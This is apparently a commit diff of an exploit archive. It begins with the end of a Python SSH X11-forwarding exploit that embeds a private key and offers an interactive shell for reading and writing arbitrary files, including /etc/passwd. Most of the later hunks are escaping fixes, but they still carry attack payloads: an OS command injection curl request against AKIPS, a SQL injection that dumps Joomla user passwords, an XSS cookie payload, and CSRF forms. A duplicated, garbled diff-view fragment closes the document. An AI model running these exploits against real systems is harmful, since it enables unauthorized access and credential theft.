 MIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69
 9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn
 PLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN
 zKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts
 U68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh
 TLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH
 SBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W
 s1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O
 aDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne
 euQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T
 A7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA
 rhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe
 DDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj
 bDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc
 KPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9
 2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY
 nimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw
 Gt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM
 F0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f
 W3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr
 bjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/
 nY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL
 b4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX
 Ao8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV
 pryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv
 -----END RSA PRIVATE KEY-----"""
 if __name__=="__main__":
    logging.basicConfig(loglevel=logging.DEBUG)
    LOGGER.setLevel(logging.DEBUG)
    if not len(sys.argv)>4:
        print """ Usage: <host> <port> <username> <password or path_to_privkey>
        path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
 """
        sys.exit(1)
    hostname, port, username, password = sys.argv[1:]
    port = int(port)
    pkey = None
    if os.path.isfile(password):
        password = None
        with open(password,'r') as f:
            pkey = f.read()
    elif password==".demoprivkey":
        pkey = PRIVKEY
        password = None
        LOGGER.info("add this line to your authorized_keys file: \n%s"%demo_authorized_keys)
    LOGGER.info("connecting to: %s:%s@%s:%s"%(username,password if not pkey else "<PKEY>", hostname, port))
    ex = SSHX11fwdExploit(hostname, port=port,
                          username=username, password=password,
                          pkey=pkey,
                          timeout=10
                          )
    LOGGER.info("connected!")
    LOGGER.info ("""
 Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>
 """)
    while True:
        cmd = raw_input("#> ").strip()
        if cmd.lower().startswith(".exit") or cmd.lower().startswith(".quit"):
            break
        elif cmd.lower().startswith(".info"):
            LOGGER.info(ex.exploit("\ninfo"))
        elif cmd.lower().startswith(".readfile"): 
            LOGGER.info(ex.exploit_fwd_readfile(cmd.split(" ",1)[1]))
        elif cmd.lower().startswith(".writefile"):
            parts = cmd.split(" ")
            LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))
        else:
            LOGGER.info(ex.exploit('\n%s'%cmd))
    # just playing around   
    #print ex.exploit_fwd_readfile("/etc/passwd")
    #print ex.exploit("\ninfo")
    #print ex.exploit("\ngenerate <ip>:600<port> .")                # generate <ip>:port  port=port+6000
    #print ex.exploit("\nlist")
    #print ex.exploit("\nnlist")
    #print ex.exploit('\nadd xx xx "\n')
    #print ex.exploit('\ngenerate :0 . data "')
    #print ex.exploit('\n?\n')
    #print ex.exploit_fwd_readfile("/etc/passwd")
    #print ex.exploit_fwd_write_("/tmp/somefile", data="`whoami`")
    LOGGER.info("--quit--")
--- a/platforms/multiple/remote/7760.php
+++ b/platforms/multiple/remote/7760.php
@ -75,7 +75,7 @@ function info()
 10-01-09 00:24:28,WARNING,Info,SERVER,	Default VirtualServer created
 10-01-09 00:24:28,WARNING,Info,SERVER,	admin account info: username: admin password: kcqy8y
 10-01-09 00:24:28,WARNING,Info,SERVER,	superadmin account info: username: superadmin password: e7em45
-10-01-09 00:24:29,ALL,Info,server,	Server init finished</textarea></form>';
+10-01-09 00:24:29,ALL,Info,server,	Server init finished&lt;/textarea&gt;</form>';
 }
 function head()
@ -127,7 +127,7 @@ if (isset($_GET['go_fuck']))
 	if (isset($_POST['parampampam']))
 	{
-		echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>';
+		echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'&lt;/textarea&gt;';
 		html();
 	}
--- a/platforms/multiple/webapps/14606.html
+++ b/platforms/multiple/webapps/14606.html
@ -430,13 +430,13 @@ CSRF -
    <h3>Detailed information</h3>
-    <textarea cols="60" id="user_details" name="user[details]" rows="5"></textarea>
+    <textarea cols="60" id="user_details" name="user[details]" rows="5">&lt;/textarea&gt;
    <p>Optional detailed information concerning this user, e.g. an address. This information is visible to agents only, never to end-users.</p>
    <h3>Notes</h3>
-    <textarea cols="60" id="user_notes" name="user[notes]" rows="5"></textarea>
+    <textarea cols="60" id="user_notes" name="user[notes]" rows="5">&lt;/textarea&gt;
    <p>Optional notes concerning this user. Notes can also be added/edited for a requester directly on the ticket form page.<br/>Notes are visible to agents only, never to any end-user.</p>
--- a/platforms/novell/remote/1679.pm
+++ b/platforms/novell/remote/1679.pm
@ -1,4 +1,3 @@
 ##
 # This file is part of the Metasploit Framework and may be redistributed
 # according to the licenses defined in the Authors field below. In the
--- a/platforms/osx/remote/1519.pm
+++ b/platforms/osx/remote/1519.pm
@ -1,4 +1,3 @@
 ##
 # This file is part of the Metasploit Framework and may be redistributed
 # according to the licenses defined in the Authors field below. In the
--- a/platforms/perl/webapps/39564.txt
+++ b/platforms/perl/webapps/39564.txt
@ -0,0 +1,46 @@
 # Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection
 # Date: 03-14-2016
 # Exploit Author: BrianWGray
 # Contact: https://twitter.com/BrianWGray 
 # WebPage: http://somethingbroken.com/
 # Vendor Homepage: https://www.akips.com/
 # Software Link: https://www.akips.com/showdoc/download
 # Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6
 # Tested on: FreeBSD 10.2-RELEASE-p7
 # CVE : N/A
 1. Description
 The "username" login parameter allows for OS Command injection via command Injection during a failed login attempt returns the command injection output to a limited login failure field.
 By using concatenation '||' a command may be appended to the username.
 The vendor has stated the following:
 "Apparently the issue is in a Perl module which does an open2() of a
 custom PAM program.  The command is not being properly sanitised." - Vendor Reply
 http://somethingbroken.com/vuln/0002.html
 2. Proof of Concept
 example request:
 curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:"
 example response: 
 <div class="alert alert-warning"><strong>Error signing in:</strong> akips</div>
 3. Solution:
 Update to version 16.6
 https://www.akips.com/showdoc/download
 4. Timeline:
 * 03-14-2016: Discovered, Vendor Notified, Vendor Response
 * 03-15-2016: Vendor Releases Remediated Build 16.6
--- a/platforms/php/webapps/10379.txt
+++ b/platforms/php/webapps/10379.txt
@ -276,7 +276,7 @@ admin with default username 'admin' (you can't change that in admin panel or any
  <select name="theme">
    <option value="pedja" selected>pedja</option>
  </select>
-  <textarea name="about">I have been hacked</textarea>
+  <textarea name="about">I have been hacked&lt;/textarea&gt;
  <input type="submit" value="Snimi promene" name="submit" id="submitButton">
 </form>
 <script>document.forms[0].submit.click();</script>
--- a/platforms/php/webapps/10388.txt
+++ b/platforms/php/webapps/10388.txt
@ -49,7 +49,7 @@ and i found some sweet CSRF exploits in admin panel.
  <select name='lists'>
    <option value='0' selected>All</option>
  </select>
-  <textarea name='nletter' rows='8' cols='60' id='7'>Mail message here</textarea>
+  <textarea name='nletter' rows='8' cols='60' id='7'>Mail message here&lt;/textarea&gt;
  <input type='submit' name='submit' value='submit'>
 </form>
--- a/platforms/php/webapps/10570.txt
+++ b/platforms/php/webapps/10570.txt
@ -1,4 +1,3 @@
 PenTest Information:
 ====================
 GESEC Team(~smash & ~rem0ve) discover a SQL Injection Vulnerability on Pandora FMS Monitoring Software.
--- a/platforms/php/webapps/10640.txt
+++ b/platforms/php/webapps/10640.txt
@ -1,4 +1,3 @@
 Joomla Component com_schools SQL injection
 author:Mr.tro0oqy
 email:t.4@windowslive.com
--- a/platforms/php/webapps/10656.txt
+++ b/platforms/php/webapps/10656.txt
@ -1,4 +1,3 @@
 [+]  B2B Trading Marketplace SQL Injection Vulnerability
 [+]  Software : B2B Trading Marketplace Script
--- a/platforms/php/webapps/10671.txt
+++ b/platforms/php/webapps/10671.txt
@ -1,4 +1,3 @@
                          ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
--- a/platforms/php/webapps/10844.txt
+++ b/platforms/php/webapps/10844.txt
@ -1,4 +1,3 @@
                          ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
--- a/platforms/php/webapps/10847.txt
+++ b/platforms/php/webapps/10847.txt
@ -1,4 +1,3 @@
                          ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
--- a/platforms/php/webapps/10889.txt
+++ b/platforms/php/webapps/10889.txt
@ -1,4 +1,3 @@
 Script      : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
 Script site : http://cms.dsinternal.com/Home 
--- a/platforms/php/webapps/10971.txt
+++ b/platforms/php/webapps/10971.txt
@ -1,4 +1,3 @@
 [?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
 [?]
 [~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection
--- a/platforms/php/webapps/10979.txt
+++ b/platforms/php/webapps/10979.txt
@ -1,4 +1,3 @@
 # Exploit Title: Joomla component com_oziogallery2 / IMAGIN arbitrary file write
 # Date: 01-01-10
 # Author: Ubik and er
--- a/platforms/php/webapps/11449.txt
+++ b/platforms/php/webapps/11449.txt
@ -1,4 +1,3 @@
 http://server/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users
 Snakespc
--- a/platforms/php/webapps/11484.txt
+++ b/platforms/php/webapps/11484.txt
@ -1,4 +1,3 @@
 ########################################################################
 ##uGround v1.0b SQL Injection                                         ##
 ########################################################################
--- a/platforms/php/webapps/11543.txt
+++ b/platforms/php/webapps/11543.txt
@ -1,6 +1,5 @@
                     =======================================================================
                                         Softbiz Jobs CSRF Vulnerability
--- a/platforms/php/webapps/12007.txt
+++ b/platforms/php/webapps/12007.txt
@ -1,4 +1,3 @@
 ==============================================================================================================
--- a/platforms/php/webapps/12028.txt
+++ b/platforms/php/webapps/12028.txt
@ -1,4 +1,3 @@
 ========================================================
 PHP-fusion dsmsf (module downloads) SQL Inj3ct0r Exploit
 ========================================================
--- a/platforms/php/webapps/12054.txt
+++ b/platforms/php/webapps/12054.txt
@ -1,4 +1,3 @@
 ======================================================================================================================
--- a/platforms/php/webapps/12055.txt
+++ b/platforms/php/webapps/12055.txt
@ -1,4 +1,3 @@
 =========================================================================================================================
--- a/platforms/php/webapps/12056.txt
+++ b/platforms/php/webapps/12056.txt
@ -1,4 +1,3 @@
 ============================================================================================================================
--- a/platforms/php/webapps/12082.txt
+++ b/platforms/php/webapps/12082.txt
@ -1,4 +1,3 @@
 =========================================================================================================
--- a/platforms/php/webapps/12083.txt
+++ b/platforms/php/webapps/12083.txt
@ -1,4 +1,3 @@
 ============================================================================================================
--- a/platforms/php/webapps/12084.txt
+++ b/platforms/php/webapps/12084.txt
@ -1,5 +1,4 @@
 =============================================================================================================
--- a/platforms/php/webapps/12085.txt
+++ b/platforms/php/webapps/12085.txt
@ -1,4 +1,3 @@
 ==================================================================================================================
--- a/platforms/php/webapps/12087.txt
+++ b/platforms/php/webapps/12087.txt
@ -1,4 +1,3 @@
 ============================================================================================================
--- a/platforms/php/webapps/12088.txt
+++ b/platforms/php/webapps/12088.txt
@ -1,4 +1,3 @@
 ===============================================================================================================
--- a/platforms/php/webapps/12089.txt
+++ b/platforms/php/webapps/12089.txt
@ -1,4 +1,3 @@
 ===============================================================================================================
--- a/platforms/php/webapps/12101.txt
+++ b/platforms/php/webapps/12101.txt
@ -1,4 +1,3 @@
 (o)===============================================================================(o)
                  Joomla Component aWiki Local File Inclusion
--- a/platforms/php/webapps/12115.txt
+++ b/platforms/php/webapps/12115.txt
@ -1,4 +1,3 @@
 =============================================
 Kubeit CMS Remote SQL Injection Vulnerability
 =============================================
--- a/platforms/php/webapps/12118.txt
+++ b/platforms/php/webapps/12118.txt
@ -1,4 +1,3 @@
 ===============================================================================================================
--- a/platforms/php/webapps/12142.txt
+++ b/platforms/php/webapps/12142.txt
@ -1,4 +1,3 @@
 ====================================================================================================
--- a/platforms/php/webapps/12143.txt
+++ b/platforms/php/webapps/12143.txt
@ -1,4 +1,3 @@
 ================================================================================================================
--- a/platforms/php/webapps/12144.txt
+++ b/platforms/php/webapps/12144.txt
@ -1,4 +1,3 @@
 =======================================================================================================================
--- a/platforms/php/webapps/12145.txt
+++ b/platforms/php/webapps/12145.txt
@ -1,4 +1,3 @@
 ===============================================================================================================
--- a/platforms/php/webapps/12146.txt
+++ b/platforms/php/webapps/12146.txt
@ -1,4 +1,3 @@
 =====================================================================================================================
--- a/platforms/php/webapps/12147.txt
+++ b/platforms/php/webapps/12147.txt
@ -1,4 +1,3 @@
 =================================================================================================================
--- a/platforms/php/webapps/12148.txt
+++ b/platforms/php/webapps/12148.txt
@ -1,4 +1,3 @@
 ==================================================================================================================
--- a/platforms/php/webapps/12149.txt
+++ b/platforms/php/webapps/12149.txt
@ -1,4 +1,3 @@
 ===================================================================================================================
--- a/platforms/php/webapps/12150.txt
+++ b/platforms/php/webapps/12150.txt
@ -1,4 +1,3 @@
 ===============================================================================================================
--- a/platforms/php/webapps/12151.txt
+++ b/platforms/php/webapps/12151.txt
@ -1,4 +1,3 @@
 ================================================================================================================
--- a/platforms/php/webapps/12230.txt
+++ b/platforms/php/webapps/12230.txt
@ -1,4 +1,3 @@
 ==============================================================================================================
--- a/platforms/php/webapps/12231.txt
+++ b/platforms/php/webapps/12231.txt
@ -1,4 +1,3 @@
 ==================================================================================================================
--- a/platforms/php/webapps/12232.txt
+++ b/platforms/php/webapps/12232.txt
@ -1,4 +1,3 @@
 ===========================================================================================================
--- a/platforms/php/webapps/12233.txt
+++ b/platforms/php/webapps/12233.txt
@ -1,4 +1,3 @@
 =================================================================================================================
--- a/platforms/php/webapps/12234.txt
+++ b/platforms/php/webapps/12234.txt
@ -1,4 +1,3 @@
 ===========================================================================================================
--- a/platforms/php/webapps/12235.txt
+++ b/platforms/php/webapps/12235.txt
@ -1,4 +1,3 @@
 =================================================================================================================
--- a/platforms/php/webapps/12236.txt
+++ b/platforms/php/webapps/12236.txt
@ -1,4 +1,3 @@
 =========================================================================================================
--- a/platforms/php/webapps/12237.txt
+++ b/platforms/php/webapps/12237.txt
@ -1,4 +1,3 @@
 ===============================================================================================================
--- a/platforms/php/webapps/12238.txt
+++ b/platforms/php/webapps/12238.txt
@ -1,4 +1,3 @@
 =================================================================================================================
--- a/platforms/php/webapps/12239.txt
+++ b/platforms/php/webapps/12239.txt
@ -1,4 +1,3 @@
 ==================================================================================================================
--- a/platforms/php/webapps/12296.txt
+++ b/platforms/php/webapps/12296.txt
@ -1,4 +1,3 @@
 ================================================================
 Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability
 ================================================================
--- a/platforms/php/webapps/12318.txt
+++ b/platforms/php/webapps/12318.txt
@ -1,4 +1,3 @@
 =============================================================================================================
--- a/platforms/php/webapps/12364.txt
+++ b/platforms/php/webapps/12364.txt
@ -1,4 +1,3 @@
 ================================================
 Openpresse 1.01 Local File Include Vulnerability
 ================================================
--- a/platforms/php/webapps/12365.txt
+++ b/platforms/php/webapps/12365.txt
@ -1,4 +1,3 @@
 ===============================================================
 Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability
 ===============================================================
--- a/platforms/php/webapps/12366.txt
+++ b/platforms/php/webapps/12366.txt
@ -1,5 +1,4 @@
 ==============================================================
 Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability
 ==============================================================
--- a/platforms/php/webapps/12426.txt
+++ b/platforms/php/webapps/12426.txt
@ -1,4 +1,3 @@
 =======================================================================================================================
--- a/platforms/php/webapps/12428.txt
+++ b/platforms/php/webapps/12428.txt
@ -1,4 +1,3 @@
 ===============================================================================================================
--- a/platforms/php/webapps/12481.txt
+++ b/platforms/php/webapps/12481.txt
@ -1,4 +1,3 @@
 Software: WHMCS control 2  Sql Injection             
 Vulnerability: Remote Sql Injection                                      
--- a/platforms/php/webapps/12579.txt
+++ b/platforms/php/webapps/12579.txt
@ -1,4 +1,3 @@
 Joomla Custom PHP Pages Component LFI Vulnerability
 =====================================================
--- a/platforms/php/webapps/12594.txt
+++ b/platforms/php/webapps/12594.txt
@ -1,4 +1,3 @@
 =========================================================================================================
--- a/platforms/php/webapps/12790.txt
+++ b/platforms/php/webapps/12790.txt
@ -1,4 +1,3 @@
 =============================================================================================================
--- a/platforms/php/webapps/12811.txt
+++ b/platforms/php/webapps/12811.txt
@ -1,4 +1,3 @@
      ______                _       _   _             
      | ___ \              | |     | | (_)            
      | |_/ /_____   _____ | |_   _| |_ _  ___  _ __  
--- a/platforms/php/webapps/12856.txt
+++ b/platforms/php/webapps/12856.txt
@ -36,7 +36,7 @@ FILE NAME:<br>
 <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> 
-<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> 
+<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 
 <input name="submit" type="submit" value="   Save   " > 
--- a/platforms/php/webapps/12867.txt
+++ b/platforms/php/webapps/12867.txt
@ -1,4 +1,3 @@
 ####################################################
 # clickartweb Design SQL Injection Vulnerability
 ####################################################
--- a/platforms/php/webapps/13925.txt
+++ b/platforms/php/webapps/13925.txt
@ -21,7 +21,7 @@ action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/
 <label for="subject">Subject:</label><input id="subject" name="subject" 
 type="text" /><br />
 <label for="message">Message:</label><textarea id="message" 
-name="message"></textarea><br />
+name="message">&lt;/textarea&gt;<br />
 <input type="submit" value="Send"/>
 </form>
--- a/platforms/php/webapps/14415.html
+++ b/platforms/php/webapps/14415.html
@ -37,7 +37,7 @@ FILE NAME:<br>
 <input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
-<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> 
+<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 
 <input name="submit" type="submit" value="   Save   " > 
--- a/platforms/php/webapps/1547.txt
+++ b/platforms/php/webapps/1547.txt
@ -8,7 +8,7 @@
 [PoC]
 1- XSS
-	- Post a message including the following line: </textarea>'"><script>alert(document.cookie)</script>
+	- Post a message including the following line: &lt;/textarea&gt;'"><script>alert(document.cookie)</script>
 	- Valid.
 	- Click on "Citer" to execute the script.
--- a/platforms/php/webapps/1875.htm
+++ b/platforms/php/webapps/1875.htm
@ -233,7 +233,7 @@ Date of Birth  </td>
 Signature (&lt; 100 characters)  </td>
  <td bgcolor="#BBBBBB" colspan="3">
-<textarea name="sig" rows="3" cols="35">   </textarea>
+<textarea name="sig" rows="3" cols="35">   &lt;/textarea&gt;
  </td>
 </tr>
 <tr>
--- a/platforms/php/webapps/2413.txt
+++ b/platforms/php/webapps/2413.txt
@ -1,4 +1,3 @@
 :::::::::  :::::::::: :::     ::: ::::::::::: :::        
 :+:    :+: :+:        :+:     :+:     :+:     :+:        
 +:+    +:+ +:+        +:+     +:+     +:+     +:+        
--- a/platforms/php/webapps/2554.php
+++ b/platforms/php/webapps/2554.php
@ -44,7 +44,7 @@ fclose($f);
 passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
 }
 ?>
-</textarea>
+&lt;/textarea&gt;
 <br>
 Powered By  Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
 </center>
--- a/platforms/php/webapps/2574.php
+++ b/platforms/php/webapps/2574.php
@ -62,7 +62,7 @@ $aname = explode( "><input type=text name=cname maxlength=64 value=\"",$data);
 $bname = explode( "\">",$aname[1 ]);
 $name = $bname[ 0];
 $ahash = explode( "<textarea name=comment rows=10 cols=40 wrap=physical>",$data);
-$bhash = explode( "</textarea>",$ahash[1 ]);
+$bhash = explode( "&lt;/textarea&gt;",$ahash[1 ]);
 $hash = $bhash[ 0];
 if(strlen($hash) !=  32){ 
--- a/platforms/php/webapps/2883.txt
+++ b/platforms/php/webapps/2883.txt
@ -67,7 +67,7 @@
 <select class=altButton name="newfileext">
 <option>.txt</option><option>.html</option><option>.php</option>
 </select>
- <textarea name="newcontent" cols="60" rows="15"></textarea>
+ <textarea name="newcontent" cols="60" rows="15">&lt;/textarea&gt;
 <input type="hidden" name="copt" value="1">
 <input type="submit" name="savenew" value="Save">
 <input type="hidden" name="u" value="">
--- a/platforms/php/webapps/2940.txt
+++ b/platforms/php/webapps/2940.txt
@ -1,4 +1,3 @@
 *******************************************************************************************
 # Title   :  mxBB Module Charts <= 1.0.0(module_root_path) Remote File Include Vulnerability
 # Author  :  ajann
--- a/platforms/php/webapps/3205.txt
+++ b/platforms/php/webapps/3205.txt
@ -1,4 +1,3 @@
                   _________________________________
          ________|                                 |________
          \       |              S.W.A.T.           |       /
--- a/platforms/php/webapps/3271.php
+++ b/platforms/php/webapps/3271.php
@ -88,7 +88,7 @@ You can run exploit in html:
 <form action="http://site.gov.pl/ggcms_path/admin/subpages.php" method="post">
 				<input name="saveSubpage" value="1" />
 				<input name="subpageName" value="../../../templates/default/index" />
-				<textarea name="subpageContent"></textarea>
+				<textarea name="subpageContent">&lt;/textarea&gt;
 				<input type="submit" value="Zapisz" />
 			</form></html>
 [/code]
--- a/platforms/php/webapps/3286.asp
+++ b/platforms/php/webapps/3286.asp
@ -346,7 +346,7 @@ Set objtake=Nothing
 <b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p>
 <textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000">
 <% Response.Write "<" & sonuc %>
-</textarea>
+&lt;/textarea&gt;
 </p>
 </center>
--- a/platforms/php/webapps/3287.asp
+++ b/platforms/php/webapps/3287.asp
@ -345,7 +345,7 @@ Set objtake=Nothing
 <b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p>
 <textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000">
 <% Response.Write "<" & sonuc %>
-</textarea>
+&lt;/textarea&gt;
 </p>
 </center>
--- a/Show more
+++ b/Show more
`@ -1,4 +1,3 @@`

	`<!--`	`<!--`

	`Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String`	`Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String`
`@ -1,4 +1,3 @@`

	`[+] B2B Trading Marketplace SQL Injection Vulnerability`	`[+] B2B Trading Marketplace SQL Injection Vulnerability`

	`[+] Software : B2B Trading Marketplace Script`	`[+] Software : B2B Trading Marketplace Script`
`@ -1,4 +1,3 @@`

	`Script : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability`	`Script : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability`

	`Script site : http://cms.dsinternal.com/Home`	`Script site : http://cms.dsinternal.com/Home`
`@ -1,4 +1,3 @@`

	`http://server/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users`	`http://server/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users`

	`Snakespc`	`Snakespc`
`@ -1,6 +1,5 @@`



	`=======================================================================`	`=======================================================================`

	`Softbiz Jobs CSRF Vulnerability`	`Softbiz Jobs CSRF Vulnerability`
`@ -1,5 +1,4 @@`


	`=============================================================================================================`	`=============================================================================================================`
`@ -1,4 +1,3 @@`

	`(o)===============================================================================(o)`	`(o)===============================================================================(o)`

	`Joomla Component aWiki Local File Inclusion`	`Joomla Component aWiki Local File Inclusion`
`@ -1,4 +1,3 @@`

	`Software: WHMCS control 2 Sql Injection`	`Software: WHMCS control 2 Sql Injection`

	`Vulnerability: Remote Sql Injection`	`Vulnerability: Remote Sql Injection`
`@ -1,4 +1,3 @@`

	`Joomla Custom PHP Pages Component LFI Vulnerability`	`Joomla Custom PHP Pages Component LFI Vulnerability`
	`=====================================================`	`=====================================================`